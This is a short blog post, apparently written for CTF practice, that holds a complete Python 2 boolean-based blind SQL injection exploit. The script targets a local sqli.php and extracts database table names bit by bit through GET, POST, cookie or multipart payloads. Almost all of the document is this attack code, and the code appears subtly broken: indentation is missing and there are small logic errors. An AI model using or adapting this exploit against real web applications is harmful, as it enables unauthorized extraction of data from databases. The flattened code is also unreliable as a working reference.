Sometimes I need blind sql injection codes for a CTF.
I will add more functions.
import sys
import re
import urllib
import urllib2
import inspect
#import base64
#import mimetypes
#import pprint
def set_globalvar():
global type_attack
global host
global findout
global n
global query
global sqli_start
global sqli_end
global url
global parameter
#query = "SELECT 1"
query = "SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.columns"
n=8
host="http://127.0.0.1"
url="/sqli.php"
parameter="a"
findout="Sample"
session=""
type_attack="GET"
#type_attack = "POST"
#type_attack = "COOKIE"
#type_attack = "MULTIPART"
sqli_start="1 AND "
sqli_end="--"
def set_error():
print("It is an error MSG from function: %s" % (inspect.stack()[1][3]))
return 0
def printr(data):
for x in data:
sys.stdout.write(x)
sys.stdout.flush()
print("")
print("")
print("[*] Exploit Complete!")
def set_send(params):
params = "IF(1=1,%s,0)" % (params)
finalquery=sqli_start+params+sqli_end
encoding_finalquery = urllib2.quote(finalquery)
if(type_attack=="GET"):
action = urllib2.build_opener()
#action.addheaders.append(('Cookie', 'SESSION=%s' %(session)))
#resp = urllib2.urlopen(host+url+"?"+parameter+"="+encoding_finalquery)
resp = action.open(host+url+"?"+parameter+"="+encoding_finalquery)
elif(type_attack=="POST"):
values = {parameter : finalquery}
cookie = urllib.urlencode(values)
resp = urllib2.urlopen(host+url, cookie)
elif(type_attack=="COOKIE"):
action = urllib2.build_opener()
action.addheaders.append(('Cookie', '%s=%s' % (parameter, encoding_finalquery)))
resp = action.open(host+url)
elif(type_attack=="MULTIPART"):
filename = "test.php"
CRLF = '\r\n'
boundary = '----WebKitFormBoundaryL4f8jRRQx76T6nV9'
parts = []
parts.append('--' + boundary)
parts.append('Content-Disposition: form-data; name="%s"' % (parameter))
parts.append('')
parts.append(finalquery)
parts.append('--' + boundary)
parts.append('Content-Disposition: form-data; name="pwd"; filename="%s"' % (filename))
parts.append('Content-Type: application/octet-stream')
parts.append('')
parts.append('1234')
parts.append('--' + boundary + '--')
parts.append('')
body= CRLF.join(parts)
headers = {'content-type' : 'multipart/form-data; boundary=%s' % (boundary)}
req = urllib2.Request(host+url, body, headers)
resp = urllib2.urlopen(req)
data = "\n".join([resp.info().get(i) for i in resp.info()])
data += "\n" + "".join([repr(x) for x in resp])
return data
def set_getbit(data):
try:
bit = re.findall(findout, data)
if findout in bit: return '1'
else: return '0'
except IndexError: raise RuntimeError
except TypeError: raise RuntimeError
def set_getvalue(val, n=8):
byte=""
for bit in range(n-1, -1, -1):
tmp = set_getbit(set_send("(%s>>%d&1)" % (val, bit)))
byte += tmp
return int(byte, 2)
def set_getlength(content):
return set_getvalue("LENGTH(%s)" % content, 32)
def set_getstring(content):
length = set_getlength(content)
print(" [-] Lengh: %s" % length)
print(" [-] Result")
for i in xrange(length+1):
yield chr(set_getvalue("ASCII(MID((%s),%d,1))" % (content, i)))
def get_sqlexploit(query):
print(" [-] Method: %s" % (type_attack))
if not ((type_attack is "GET") or (type_attack is "POST") or (type_attack is "COOKIE") or (type_attack is "MULTIPART")):
print("Please check type of the attack")
set_error()
else:
'''
MySQL If Statement
IF(condition,true-part,false-part) (M)
SELECT IF(1=1,'true','false')
SQL Server If Statement
IF condition true-part ELSE false-part (S)
IF (1=1) SELECT 'true' ELSE SELECT 'false'
'''
try:
for i in set_getstring("(%s)" %(query)): yield i
except RuntimeError:
yield "SQL error."
raise StopIteration
def main():
set_globalvar()
print(" - A Bool-based SQL Injection Vulnerability Exploit")
print("")
print(" Author: Kerz")
print(" Date: 05/07/2013")
print("")
print("[*] Target: %s" % host+url)
print("[+] Injection")
printr(get_sqlexploit(query))
if __name__ == '__main__':
main()
Reference: www.exploit-db.com/download_pdf/12967/
No comments:
Post a Comment